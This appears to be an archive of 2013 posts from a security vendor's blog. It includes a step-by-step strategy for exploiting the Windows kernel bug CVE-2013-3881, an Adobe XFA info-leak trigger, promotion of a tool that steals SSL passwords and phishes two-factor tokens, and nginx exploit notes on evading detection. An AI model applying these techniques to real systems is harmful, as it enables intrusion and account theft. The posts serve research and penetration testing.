Monday, November 4, 2013

Exploiting CVE-2013-3881: A Win32k NULL Page Vulnerability

Microsoft Security Bulletin MS13-081 announced an elevation of privilege vulnerability []. Several days later Endgame published [] some further details on the vulnerability in question but did not provide full exploitation details. In this post we will discuss how to successfully exploit CVE-2013-3881.

The Vulnerability

The vulnerability resides in xxxTrackPopupMenuEx, this function is responsible for displaying shortcut menus and tracking user selections. During this process it will try to get a reference to the GlobalMenuState object via a call to xxxMNAllocMenuState, if the object is in use, for example: when another pop-up menu is already active, this function will try to create a new instance.

If xxxMNAllocMenuState fails it will return False but it will also set the pGlobalMenuState thread global variable to NULL. The caller verifies the return value, and in case of failure it will try to do some cleanup in order to fail gracefully.

During this cleanup the xxxEndMenuState procedure is called. This function's main responsibility is to free and unlock all the resources acquired and saved for the MenuState object, but it does not check that the pGlobalMenuState variable is not NULL before using it. As a result a bunch of kernel operations are performed on a kernel object whose address is zero and thus potentially controlled from userland memory on platforms that allow it.

Triggering the vulnerability is relatively easy by just creating and displaying two popup instances and exhausting GDI objects for the current session, as explained by Endgame. However, actually getting code execution is not trivial.


Usually a NULL dereference vulnerability in the kernel can be exploited by mapping memory at address zero in userland memory (when allowed by the OS), creating a fake object inside of this null page and then triggering the vulnerability in the kernel from the current process context of your exploit which has the null page mapped with attacker controlled data. With some luck we get a function pointer of some sort called from our controlled object data and we achieve code execution with Kernel privileges (e.g. this was the case of MS11-054). As such, NULL dereference vulnerabilities have for many years provided a simple and straightforward route to kernel exploitation and privilege escalation in scenarios where you are allowed to map at zero.

Unfortunately  in the case of CVE-2013-3881 life is not that simple, even on platforms that allow the null page to be allocated.

When xxxTrackPopupMenuEx calls xxxMNAllocMenuState and fails, it will directly jump to destroy the (non-existant) MenuState object, and after some function calls, it will inevitably try to free the memory. This means that it does not matter if we create a perfectly valid object at region zero. At some point before xxxEndMenuState returns, a call to ExFreePoolWithTag(0x0, tag) will be made. This call will produce a system crash as it tries to access the pool headers which are normally located just before the poolAddress which in this case is at address 0. Thus the kernel tries to fetch at 0-minus something which is unallocated and/or uncontrolled memory and we trigger a BSOD.

This means the only viable exploitation option is to try and get code execution before this Free occurs.

Situational Awareness

At this point we try to understand the entire behavior of xxxEndMenuState, and all of the structures and objects being manipulated before we trigger any fatal crash. The main structure we have to deal with is the one that is being read from address zero, which is referenced from the pGlobalMenuState variable:

+0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU
+0x004 fMenuStarted : Pos 0, 1 Bit
+0x004 fIsSysMenu : Pos 1, 1 Bit
+0x004 fInsideMenuLoop : Pos 2, 1 Bit
+0x004 fButtonDown : Pos 3, 1 Bit
+0x004 fInEndMenu : Pos 4, 1 Bit
+0x004 fUnderline : Pos 5, 1 Bit
+0x004 fButtonAlwaysDown : Pos 6, 1 Bit
+0x004 fDragging : Pos 7, 1 Bit
+0x004 fModelessMenu : Pos 8, 1 Bit
+0x004 fInCallHandleMenuMessages : Pos 9, 1 Bit
+0x004 fDragAndDrop : Pos 10, 1 Bit
+0x004 fAutoDismiss : Pos 11, 1 Bit
+0x004 fAboutToAutoDismiss : Pos 12, 1 Bit
+0x004 fIgnoreButtonUp : Pos 13, 1 Bit
+0x004 fMouseOffMenu : Pos 14, 1 Bit
+0x004 fInDoDragDrop : Pos 15, 1 Bit
+0x004 fActiveNoForeground : Pos 16, 1 Bit
+0x004 fNotifyByPos : Pos 17, 1 Bit
+0x004 fSetCapture : Pos 18, 1 Bit
+0x004 iAniDropDir : Pos 19, 5 Bits
+0x008 ptMouseLast : tagPOINT
+0x010 mnFocus : Int4B
+0x014 cmdLast : Int4B
+0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO
+0x01c dwLockCount : Uint4B
+0x020 pmnsPrev : Ptr32 tagMENUSTATE
+0x024 ptButtonDown : tagPOINT
+0x02c uButtonDownHitArea : Uint4B
+0x030 uButtonDownIndex : Uint4B
+0x034 vkButtonDown : Int4B
+0x038 uDraggingHitArea : Uint4B
+0x03c uDraggingIndex : Uint4B
+0x040 uDraggingFlags : Uint4B
+0x044 hdcWndAni : Ptr32 HDC__
+0x048 dwAniStartTime : Uint4B
+0x04c ixAni : Int4B
+0x050 iyAni : Int4B
+0x054 cxAni : Int4B
+0x058 cyAni : Int4B
+0x05c hbmAni : Ptr32 HBITMAP__
+0x060 hdcAni : Ptr32 HDC__

This is the main object which xxxEndMenuState will deal with, it will perform a couple of actions using the object and finally attempts to free it with the call to ExFreePoolWithTag. The interaction with the object that occurs prior to the free are the ones we have to analyze deeply as they are our only hope in getting code execution before the imminent crash.

xxxEndMenuState is a destructor, and as such it will first call the destructor of all the objects contained inside the main object before actually freeing their associated allocated memory, for example:


The _MNFreePopup call is very interesting, as PopupMenu objects contain several WND objects and these have Handle references. This is relevant because if this WND object has its lock count equal to one when MNFreePopup is called, at some point it will try to destroy the object that the Handle is referencing. These objects are global to a user session. This means that we can force the deletion of any object within the current windows session, or at the very least decrement its reference count.

+0x000 fIsMenuBar : Pos 0, 1 Bit
+0x000 fHasMenuBar : Pos 1, 1 Bit
+0x000 fIsSysMenu : Pos 2, 1 Bit
+0x000 fIsTrackPopup : Pos 3, 1 Bit
+0x000 fDroppedLeft : Pos 4, 1 Bit
+0x000 fHierarchyDropped : Pos 5, 1 Bit
+0x000 fRightButton : Pos 6, 1 Bit
+0x000 fToggle : Pos 7, 1 Bit
+0x000 fSynchronous : Pos 8, 1 Bit
+0x000 fFirstClick : Pos 9, 1 Bit
+0x000 fDropNextPopup : Pos 10, 1 Bit
+0x000 fNoNotify : Pos 11, 1 Bit
+0x000 fAboutToHide : Pos 12, 1 Bit
+0x000 fShowTimer : Pos 13, 1 Bit
+0x000 fHideTimer : Pos 14, 1 Bit
+0x000 fDestroyed : Pos 15, 1 Bit
+0x000 fDelayedFree : Pos 16, 1 Bit
+0x000 fFlushDelayedFree : Pos 17, 1 Bit
+0x000 fFreed : Pos 18, 1 Bit
+0x000 fInCancel : Pos 19, 1 Bit
+0x000 fTrackMouseEvent : Pos 20, 1 Bit
+0x000 fSendUninit : Pos 21, 1 Bit
+0x000 fRtoL : Pos 22, 1 Bit
+0x000 iDropDir : Pos 23, 5 Bits
+0x000 fUseMonitorRect : Pos 28, 1 Bit
+0x004 spwndNotify : Ptr32 tagWND
+0x008 spwndPopupMenu : Ptr32 tagWND
+0x00c spwndNextPopup : Ptr32 tagWND
+0x010 spwndPrevPopup : Ptr32 tagWND
+0x014 spmenu : Ptr32 tagMENU
+0x018 spmenuAlternate : Ptr32 tagMENU
+0x01c spwndActivePopup : Ptr32 tagWND
+0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU
+0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU
+0x028 posSelectedItem : Uint4B
+0x02c posDropped : Uint4B

In order to understand why this is so useful, let's analyze what happens when a WND object is destroyed:

pWND __stdcall HMUnlockObject(pWND pWndObject)
pWND result = pWndObject;


if (!pWndObject->cLockObj)
result = HMUnlockObjectInternal(pWndObject);
return result;

The first thing done is a decrement of the cLockObj counter, and if the counter is then zero the function HMUnlockObjectInternal is called.

pWND __stdcall HMUnlockObjectInternal( pWND pWndObject)
pWND result;
char v2;

result = pWndObject;

unsigned int entryIndex;
pHandleEntry entry;

entryIndex = pWndObject->handle & 0xFFFF;
entry = gSharedInfo.aheList + gSharedInfo.HeEntrySize * entryIndex

if ( entry->bFlags & HANDLEF_DESTROY )
if ( !(entry->bFlags & HANDLEF_INDESTROY) )
result = 0;
return result;

Once it knows that the reference count has reached zero, it has to actually destroy the object. For this task it gets the handle value and applies a mask in order to get the index of the HandleEntry into the handle table.
Then it validates some state flags, and calls HMDestroyUnlockedObject.
The HandleEntry contains information about the object type and state. This information will be used to select between the different destructor functions.

int __stdcall HMDestroyUnlockedObject(pHandleEntry handleEntry)
int index;
index = 0xC * handleEntry->bType
handleEntry->bFlags |= HANDLEF_INDESTROY;

return (gahti[v2])(handleEntry->phead);


The handle type information table (gahti) holds properties specific to each object type, as well as their Destroy functions. So this function will use the bType value from the handleEntry in order to determine which Destroy function to call.

At this point it is important to remember that we have full control over the MenuState object, and that means we can create and fully control its inner PopupMenu object, and in turn the WND objects inside this PopupMenu. This implies that we have control over the handle value in the WND object.

Another important fact is that entry zero on the gahti table is always zero, and it represents the FREE object type.

So our strategy in order to get code execution here is to, by some means, create an object whose HandleEntry in the HandleEntry table has a bType = 0x0, and bFlags = 0x1. If we can manage to do so we can then create a fake WND object with a handle that makes reference to this object of bType=0x0. When the HMDestroyUnlockedObject is called it will end up in a call gahti[0x0]. As the first element in gahti table is zero, this ends up as a "call 0". In other words we can force a path that will execute our controlled data at address zero.

What we need

We need to create a user object of bType=FREE (0x0) and bFlags= HANDLEF_DESTROY (0x1).
This is not possible directly, so we first focus on getting an object with the bFlag value equal to 0x1. For this purpose we create a Menu object, set it to a window, and then Destroy it. The internal reference count for the object did not reach zero because it is still being accessed by the window object, so it is not actually deleted but instead flagged as HANDLEF_DESTROY on the HandleEntry. This means the bFlag will equal to 0x1.

The bType value is directly associated to the Object Type. In the case of a menu object the value is 0x2 and there is no way of creating an object of type 0x0. So we focus on what ways we have to alter this value using some of the functions being called before destroying the WND object.

As you can probably remember from the PopupMenu structure shown before, it contains several WND objects, and one of the first actions performed when HMUnlockObject(pWnd) is called is to decrement the lockCount. So we simply set-up two fake WND objects in such a way that the lockCount field will be pointing to the HandleEntry->bType field. When each of those fake WND objects is destroyed it will actually perform a “dec” operation over the bType of our menu object, thus decrementing it from 0x2 to 0x0. We now have a bFlag of 0x1 and a bType of 0x0.

Using this little trick we are able to create a User object with the needed values on the HandleEntry.


First we will create a MenuObject and force it to be flagged as HANDLEF_DESTROY.

Then we will trigger the vulnerability, where xxxEndMenuState will get a reference to the menuState structure from a global thread pointer, and its value will be zero. So we map this address and create a fake MenuState structure at zero.

XxxEndMenuState will call FreePopup(..) on a popup object instance we created, and will in turn try to destroy its internal objects. Three of these objects will be fake WND objects which we also create. The first two will serve the purpose of decrementing the bType value of our menu object, and the third one will trigger a HMDestroyUnlockedObject on this same object. This will result on code execution being redirected to address 0x0 as previously discussed.

We have to remember that when we redirect execution to address 0, this memory also servers as a MenuState object. In particular the first field is a pointer to the PopupMenu object that we need to use. So what we do is to choose the address of this popup menu object in such a way that the least significant bytes of the address also represent a valid X86 jump opcode (e.g. 0x04eb translates to eb 04 in little endian memory ordering which represents a jump 4).

Finish him!

Once we achieve execution at ring 0 we patch the Enabled field on the _SEP_TOKEN_PRIVILEGES structure from the MOSDEF callback process in order to enable all the privileges for the process. We fix up the HandleEntry we modified before, and restore the stack in order to return after the PoolFree thus skipping the BSOD.

Once all of this is done we return to user-land, but now our MOSDEF process has all the privileges, this allows us to for example migrate to LSASS and get System privileges.

-- Matias Soler

Tuesday, August 6, 2013

Blackhat 2013 -- A Vendor's Perspective

Immunity was a Blackhat sponsor again this year, potentially our last outing for a while. Thanks to everyone who came by our booth! It was fun to meet customers face to face and friends we don't get to see that often.

Things I observed

- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.

- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially "tarted up" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance.

- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.

- Did Randy Couture count a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.

Things we Learned

- The big buzzword this year was "managed", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life!

- Nico and I both walked around and didn't see any new products that blew our minds.

- Immunity went with no dedicated sales staff and I think it worked out well. People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? I think regarding reputation it probably is, regarding revenue still remains to be seen.

- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.

- When Nico approaches your booth where you're advertising a product to implement "zero day protection" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.

- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo.

- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?

- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.

Booth stuff

- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved

- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.

- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.

- I think our booth looked pretty good but we did have a lot of people asking us "so what do you guys do?" If we were going to do something like this again we'd want to put some kind of sign up like: "Pen-Testing Tools for Professionals". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.

- Invest in shirts that are not black. Everyone wore black shirts.

- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.

- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.

Vendor Freebies

- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. WELL PLAYED QUALYS >:[

- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt
- Shirt Runner-Up: Splunk "Taking the sh out of it"
- Shirt honorable mention: Core Security, faux-tux shirt

- Worst Overall: I didn't like the light saber thingies at all and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedi's you should at least be able to talk about your syllabus without referring people directly to your website :P

Shameless plugs

You can read my 2012 vendor perspective blog post here.

Monday, June 24, 2013

Adobe XFA exploits for all! First Part: The Info-leak

Some notes on exploit development

There are two types of frustration as an exploit developer when you are facing a malware with a zero day or a public proof of concept that generally kick in on the first day or two.

The first one is a classic: spending hours navigating the darkest corners of the Internet, looking for a the right trial version of the vulnerable application. The more obscure the software is, the harder of a time you will have, I know dumb stack overflows that took more time to find the server than to exploit.

Luckily, this was not our case since we are exploiting Adobe Reader and you can easily find all the versions.

The second problem and the most common while reversing Chinese malware is the low percentage of success they often have. You are able to crash the vulnerable software, of course, and this is generally enough in our line of business to demonstrate the weakness. But you also want to understand what techniques they use to gain control and compare them against yours, and this requires their exploit to actually work.

In the case of the Acroform XFA bug, no matter how much we try with different environment and versions, the heap layout was never massaged correctly to allow the exploit to work.

This leaves an open question we generally have (and we have so many theories... yes, some of them involve aliens!). Why are the Chinese offensive teams not investing a couple more weeks on the heap layout, like we did, and to dramatically improve the reliability of their exploits?

In malware design, reliability == more computer owned == more money.

At the same time, from an OPSEC perspective: reliability == stealthiness. And stealthiness means you don't loose your zero day and your investment is worth more over a long term.

Technical description

The vulnerability lies in the AcroForm.api module when handling Adobe XFA Forms in a particular way. The exploit uses an XFA form with 1024 fields like this:

We first need to get UI (user interface) objects from the XFA form, and from within the UI objects the choiceList objects. We need to create 2 arrays with these objects:

These arrays will be used during the whole exploitation process. The code in charge of triggering the vulnerability is:

    var node = xfa.resolveNode

    node.oneOfChild = choiceListNodes.pop();

Everytime the oneOfChild attribute of a node is set with one of the choiceListNodes node, the vulnerability is triggered. When creating a new "XFAObject" of size 0x40, there is an access outside the bounds of the object on "XFAObject"+44, using uninitialized data. At "XFAObject"+44 there is a pointer to some structure we will describe later.  If the pointer is null nothing happens but if we are able to control that uninitialized data after the "XFAObject", we will trigger an info-leak or trigger code execution.

When the pointer is not null, an structure like the following one is accessed:
  ----  0x0 Vtable pointer
  |     0x4 RefCount
  --->  0x8 Destructor's address

This structure is accessed twice during the vulnerability trigger. Since we are in control of the RefCount and the "Vtable", if our RefCount is bigger than two, then we can use the bug as a decrement primitive, otherwise when the RefCount gets to zero, the object's destructor will be called.

We are in control of this memory so we can pretty much control what is going to be executed.
With the right heap layout set, we will a get a string followed by an object object, so with our decrement magic we decrement the null terminator and obtain the vtable address right from our object.
Infoleak running on a Windows 7

Sounds simple right? Wrong.

We can read the vtable, but we can only read it correctly if all bytes of the vtable are below 0x7f. So if any of the bytes is greater than 0x7f, we use the pointer decrement primitive to get that byte below 0x7f.


This gave us the ability to be version agnostic, and follow our mantra "an harcoded-less exploit is a happy exploit".

At this point, it was time to get into the second stage of our exploit which is sandbox bypassing. The Chinese exploit was dropping a DLL with the code. We decided that invading the hard-drive was a bad practice and so with a little help with our Python-based assembler (MOSDEF) embedded in CANVAS we decide it to embed the code into the exploit itself.

And so, we decided it was time to bypass the sandbox. But that my friends, will be for our next blogpost entry.

Keep in touch!
David and Enrique

Tuesday, June 18, 2013

Therapeutic Ramblings of a Hacker

You remember your first hack. So do I. It was in the 7th grade and I used the school's computer in the library to erase a fine I had acquired by returning a high school textbook in late.  At first I tried to reason with the librarian saying "The time allocated to read the book should be relative to the size of the book!  I can't read a psychology textbook in the same amount of time as a Dr. Seuss book!".  That didn't work.  So instead I jumped on the library's network and found a way to erase the 25 cent fine from existence.  After I did that I thought to myself "Wow.  That was actually a lot easier than I thought it would be."

Now of course that took place 142 years ago and we all now that security was a lot more 'relaxed' and arguably non-existent 142 years ago.  But has much changed?  The quick and less eloquent answer is 'no'.  Even after billions of dollars are thrown at security issues there are still unauthorized ways into networks and there are still multiple avenues to gain access to sensitive data.  Many times during penetration tests I am still left with the thought "Wow. That was actually a lot easier than I thought it would be." even 176 years after my first 'hack'.

Anti-virus - doesn't work. It can only protect you against known threats (and by 'known threats' I mean threats that were enjoying high levels of success until anti-virus finally crashed their party - well after the damage has been done).  Anti-virus is just as effective as a man with a shotgun standing in the middle of house with no windows or doors waiting for an intruder - but the shotgun will only fire when a known intruder enters the property - first-time intruders or known intruders that are wearing a different ski mask than the previous robbery get free passes.

Firewalls won't save you.  Sure they have their value and their place but as long as there are computers from the trusted network making requests out into the big bad Interwebs they can't provide the protection you would hope for.  They only reduce the effectiveness of certain types of attacks but do nothing to protect against the type of attack that hackers are using to break in today (and tomorrow, and quite possibly forever).  No software or hardware can stop some humans from being gullible, compassionate or just plain retarded.

There will always be a way in.  There will always be access to your sensitive data.  Think of it this way - can a physical safe ever be 100% burglar proof?  No.  Why?  Because it has to be designed to give someone access.  The only way to keep a physical safe 100% burglar proof would be to design it in such a way that it would never open after it was shut for the first time.  That design can't be applied to us in our society because we want access to our data. Correction, we DEMAND access to our data. If we have pathways to our data then other people have pathways to our data.  As long as you let people through your doors, grant access to anyone on your network or let code run on your devices there will always be a way in.  Our job as security professionals is just to find the pathways and reduce them to a reasonable quantity and find ways to manage risk and in so doing make it really expensive or time consuming for unauthorized persons to traverse those paths.

Everyone is vulnerable. It's rare to find people that aren't broadcasting every second of their lives to the world via social media.  I know what my girlfriend from high school had for breakfast this morning even though I haven't spoken to her in 74 years.  She even posted a picture of it (it looked delicious). Our data is out there and we are trusting it to be stored in databases that we don't control.  The pathway to enumerating corporate passwords can even start from something as innocent as an Instragram post  from a friend of an employee.  Do you know how many entry points there are to your data from the time it starts its journey from your machine (computer, phone, printer, etc) to its final destination? At least 14 trillion.  Well that was a slightly exaggerated but the point is that it's more than you think.  Don't be surprised when you find that someone has access to your data that you have purposefully sent into someone else's void - because the truth is a lot of someones have access to your data (and it's not just the NSA and PRISM).

Your wireless network is not protected very well (for acceptable definitions of 'protect'). If you don't believe me then your wireless sales guy is really, really good.  In fact most of the protocols that the Internet are built upon weren't designed with security in mind, wireless networks are no different.  And as I demonstrated in the latest SILICA video an attacker can trick you into invalidating the "S" in IMAPS/SMTPS/POP3S/HTTPS with a simple click of an innocent "OK" button. If the security of your company lies in the hands of your average employee then you are doomed.  The Internet and its wireless little brother are but a castle built on sand and it's raining really hard outside.

You can't fight hackers without hackers.  It's a frame of mind that you need to protect against - not any one specific action.  Buying shiny new security appliances is equivalent to playing a really expensive and never-ending game of whack-a-mole. (Don't get me wrong - removing attack vector #475 might be a good move but hackers will enumerate and exploit the 475-1 remaining vectors soon enough). Don't make the mistake of having security only be an afterthought.

So with that said I leave you this thought.  Hackers are creative, smart and resourceful.  Stop fearing them and hire them.  They should be included in the design phase, implementation phase, testing phase and deployment stages of your new applications, services and strategies.  So give your local hacker a hug and give him/her a lovely corporate gift basket with an invite to your next meeting.  You won't be disappointed with the results.

Thanks for listening to my therapeutic ramblings.  You can send me your ramblings to Twitter @MarkWuergler

Thursday, May 23, 2013

It's SSL Story Time with SILICA

The latest release of SILICA has extended its fake AP service impersonation attacks to support the stealing of passwords from secure protocols such as HTTPS, SMTPS, POP3S, IMAPS and also supports the interception of CRAM-MD5 password hashes in a way that can be easily cracked.

But of course you are thinking to yourself "But Mark, in order for that to work the victim would need to accept a counterfeit SSL certificate before any of the traffic could be decrypted! Of course nobody is going to accept your fake certificate!".  This has lead me to believe that some of you would think that the following is a true story:

A guy was driving to a really important meeting (the kind of meeting that would literally change his life for the better) but he noticed a sign on the only road that led to the meeting saying "You probably should not go down this road because someone could be trying to take advantage of you in uncommon and unlikely ways".  So he didn't.  And he missed his meeting.  He won at life.

Now admit that the above scenario would never actually happen as we are brave, curious, and sometimes an incurably idiotic species and consider the true outcome of the story above where he says

"Screw it - I've seen this sign in the past and nothing bad has happened to me.  I'm going to this meeting." and drove to the meeting without a care in the world.

The same is true when presenting a victim with a fake SSL certificate.  MOST ARE GOING TO ACCEPT IT, whether your choose to believe it or not.  In fact, we have calculated a 90% acceptance rate of SILICA's fake SSL certificates (that are generated on-the-fly to appear as legitimate as possible) coming from the domains that are being impersonated.

The truth is that passwords just completely flood into SILICA now from all targeted protocols as if it's a new popular trend. In fact it's borderline ridiculous.  Phones are the worst.  Like a well-trained dog your phone is eager to log in and fetch your daily life and place it at your feet.  This is good for convenience but bad for security.  As soon as an attacker becomes the access point to which your phone automatically connects the attacker almost immediately harvests web site passwords, social networking application passwords and email service passwords.  The following is a screenshot of SILICA stealing passwords (out from under SSL-enabled protocols).

Facebook, Twitter, Hotmail and Gmail account passwords intercepted in SSL traffic during a controlled phishing attacked using SILICA.

Here is a practical example of an attack - you open your iPad and you want to check your Gmail account.  So you open your email client like normal but this time you are presented with a popup message that looks like this:

90% of people will click "Continue" to get what they came for and give SILICA the passwords.

If you click "Continue" (which 90% of you will) then SILICA gets the username and password of your  Gmail account.  This is why it doesn't matter if someone clicks "Cancel" - because 90% of the victims have already given up the goods.

SILICA, Two-factor Authentication and Twitter Account Takeover

Phishing is a very effective method of stealing passwords as humans are typically the easiest service to enumerate them from.  I wrote a small extension to SILICA's phishing engine that demonstrates how to successfully take over a Twitter account even when two-factor authentication is enabled.  Hopefully this will help remove the false sense of security from your minds this is the magic solution to prevent account takeovers.

The victim user in this case will log into Twitter as normal, receive an SMS on the phone associated with the account with the legitimate token and unknowingly give them both to SILICA that will be displayed in the interface like so:

Using SILICA to successfully phish for a legitimate Twitter two-factor authentication token.

It's that easy.  Two-factor authentication just adds one more step to the entire phishing process.  Keep in mind that two-factor authentication is only meant to mitigate authentication attacks where the attacker has access to the password but not the token - it does nothing to protect the session after successful authentication has already taken place.  The new features of SILICA have the capability of taking advantage of both of these scenarios (as an example).  If it can work on Twitter then it can work on the applications that you encounter during your penetration tests.

Also keep in mind that two-factor authentication will not prevent attackers from taking over your account if they are already on your machine, in your browser or on your network.


In reality the Internet does not run on protocols that were built with security in mind.  Security is usually an afterthought after someone takes advantage and a band-aid is needed.  The protocols that you use to get your web traffic and mail are no different.

And what's worse - the protocols that attempt to secure you are still at your mercy - you are given the choice to [sometimes unknowingly] disable all security mechanisms with an innocent looking popup message that just asks you to "Continue" or with an annoying browser warning that says "blah blah maybe you shouldn't click ok blah blah blah NOW CLICK OK TO GET WHAT YOU CAME FOR".


Mark Wuergler
You can bother him here: @MarkWuergler

Jinx Part 2: nginx CVE-2013-2028

Who doesn't love vulnerabilities in web servers? We've written nginx bugs before and it was a lot of fun. Now Immunity is pleased to release to its CEU customers the 64 bit version of CVE-2013-2028 written up by a new member of the Linux exploit team. Since this is exploit is in recent versions of nginx only and in our experience most modern web servers tend to be 64 bit, we decided to develop against that architecture. This particular exploit is a good example of a modern remote exploit against hard to exploit software. There has been some good analysis of this vulnerability thus far but as Immunity has a working exploit we thought it worthwhile to chime in.

One of the first hurdles to overcome is not knowing a function's location in memory, ASLR has made information leak vulnerabilities very valuable as a result of its widespread implementation. In the absence of an information leak an attacker is left with brute force or another alternative that we'll discuss later. From there it's on to a ROP chain which may be very dependent on the version of libraries available on the system. Complicating all this is the fact that compiling software from scratch on Linux systems is very common, system administrators may pass any number of configuration or compiler options that change things just enough to break exploits that make too many assumptions.

A problem with basing targeting for exploits on pre-compiled binaries that you might get through apt-get or yum is that maintaining a list of targets and offset combinations becomes very cumbersome. And you've got to test against a large cross section of distribution and server version combinations which can be time intensive. When developing the exploit for this vulnerability we decided to make it as universal as possible and find all the memory locations we would need manually. This has the consequence of taking more time to run (5-20 minutes) but the benefit of working out of the box against more environment combinations. You may remember a similar situation with our exploit for Samba's CVE-2012-1182.

With this vulnerability the exploit takes over an nginx worker process (defined in conf/nginx.conf, default 4) and that process will not respond to other normal nginx work while your shell is active so launching a trojan and getting out of the worker if there aren't many will help avoid detection. In talking with the developer who wrote up this exploit another interesting issue presented itself. There is a condition whereby the target is vulnerable but not exploitable. If the stack canary or function addresses we use from libc contain bad bytes then that can cause exploitation to fail. The worker processes inherit their canaries from the parent and therefore killing them won't grant you a new canary and if by some cosmic roll of the dice libc is in a bad location then you're just out of luck. The upshot is that failed exploitation attempts will only kill the worker process and you can try again.

This exploit reuses the socket that established the connection to the web server in the first place. This is very helpful when dealing with hosts that have strict egress filtering, for instance where web servers are not able to initiate outbound connections. So before you upload and execute your trojan to get out of the worker process you'll want to determine what egress filtering (if any) may be in place. If you anticipate strict egress filtering is present then compromising the server during off hours and automating finding an egress part should be part of your game plan. The likelihood of crashing the server or the parent nginx process with this exploit is very low, nor did we observe the case of a worker process getting hung and no longer being available. In our testing we found the exploit to reliably get a shell over 90% of the time. The exploit presents a low risk high reliability method for getting a shell on an nginx webserver.

Wednesday, May 22, 2013

An Unusual MDaemon Exploit (a.k.a it's not always about shells)

In penetration testing there is an enormous focus on obtaining shells; and rightly so. Having that level of access to a host, regardless of privilege level, is incredibly useful for an attacker and is usually just the start of a full compromise of a host. Getting a shell can be difficult with all the modern memory corruption protections. Maintaining a shell isn't easy either as you have to contend with all manner of IDS, egress filtering, host monitoring and so forth.

Luckily having a shell isn't the only path to victory. MDaemon is a Windows based mail server (owned by BlackBerry) that is an alternative to Microsoft Exchange, it provides much of the same basic functionality but in a simpler to manage package. Using SWARM we were able to determine that while certainly not as popular as Exchange, MDaemon does have a pretty significant presence. It's not just in the commercial space either - there are government servers in various countries using this software as well.

The new CANVAS exploit takes advantage of a patched vulnerability in several versions of MDaemon that allows account takeover. Since there's not a lot of information on this vulnerability publicly available that's where I'll leave it - the curious have a low cost method for satisfying their curiosity. Many of the versions for 12.X and below are vulnerable though we have not been able to confirm how far back it goes. Account takeover allows for a lot of different interesting risks, such as getting passwords to cloud services such as Twitter reset, or social engineering other people in your organization.

We used SWARM to examine the version distribution of MDaemon for over a million IP addresses and I've summarized the results in a table below.

Version Percentage
13.X 12.6%
12.X 21.5%
11.X 20.4%
10.X 21.1%
9.X 17.4%
8.X 2.8%
7.X 2.7%
6.X 1.4%

The results are pretty interesting in a number of respects. Firstly there is a big legacy presence of MDaemon and given some of the disclosures, especially in the web portion, there are many paths to victory. Second - there are some users who just seem unable to ever upgrade their MDaemon. The rough right leaning bell curve shape of the versions is common to almost any server that does not auto update.

Friday, May 3, 2013

How common is common? Exim and Dovecot

Today a really neat advisory was released by the folks over at RedTeam Pentesting GmbH (RTP) involving a common misconfiguration when using Exim and Dovecot together. The high level is that when you use Exim as an MTA (what sends and receives mail from other servers) and Dovecot as an LDA (serves the mail to users via IMAP/POP3 etc) the example Exim configuration file Dovecot provides to make the MTA->LDA connection work has a bad configuration option whereby an attacker could get command injection on your mail server via sending mail! This is totally rad for a few reasons. First, this is going to be very reliable as it's command injection so there's no memory corruption voodoo to go wrong. Secondly, the vulnerability was introduced from one product into another by way of the admin! Plus the idea of doing command injection via email is pretty great.

In the advisory RTP released they mention that using Exim with Dovecot is a very common configuration, so I decided to see how how common it really was. To do this you'd need SMTP/IMAP/POP3 banners for large IP space, which we have courtesy of SWARM. So I wrote a few MongoDB queries and did some basic work with sets in Python and came up with some interesting answers. Without expounding too much about these data sets, they're non-overlapping IP space. We'll leave it at that as it will give affected admins more time to fix their configs. I've put the results from a few of our largest data sets into a table.

DB Size (IPs)* Exim banners Dovecot banners** Exim + Dovecot (Exim + Dovecot) / Total Exim
